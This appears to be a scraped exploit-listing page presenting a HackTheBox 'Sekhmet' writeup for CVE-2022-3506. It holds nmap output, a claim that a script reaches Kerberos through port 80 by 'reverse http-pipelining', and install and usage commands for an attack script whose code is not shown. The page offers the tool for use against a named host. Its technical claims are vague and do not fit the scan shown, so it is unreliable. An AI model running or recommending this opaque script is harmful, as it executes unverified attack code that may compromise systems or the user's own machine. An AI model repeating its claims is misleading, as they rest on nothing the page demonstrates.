Share
## https://sploitus.com/exploit?id=584F1B4E-80A0-51DA-83E7-00AC037F9C48
# Sekhmet HackTheBox Writeup
Write-up for Sekhmet HackTheBox, CVE-2022-3506, Active Directory Exploitation

```
Starting Nmap 7.88 ( https://nmap.org ) at 2022-09-10 13:01 EDT
Nmap scan report for 10.xxx.xx.xxx
Host is up (0.055s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.02 seconds
```


Using `CVE-2022-3506.py` (credit: zilla1) it is possible to tunnel through port 80 (`windcorp.htb`) and interact with Kerberos via an attack vector dubbed reverse http-pipelining.

![image](https://user-images.githubusercontent.com/113263298/189502592-743b1c3a-959b-4388-94bf-1383679e3dea.png)

## Install
```
pip install -r requirements.txt
```

## Usage
```
python3 CVE-2022-3506.py windcorp.htb/admin -dc-host windcorp.htb
```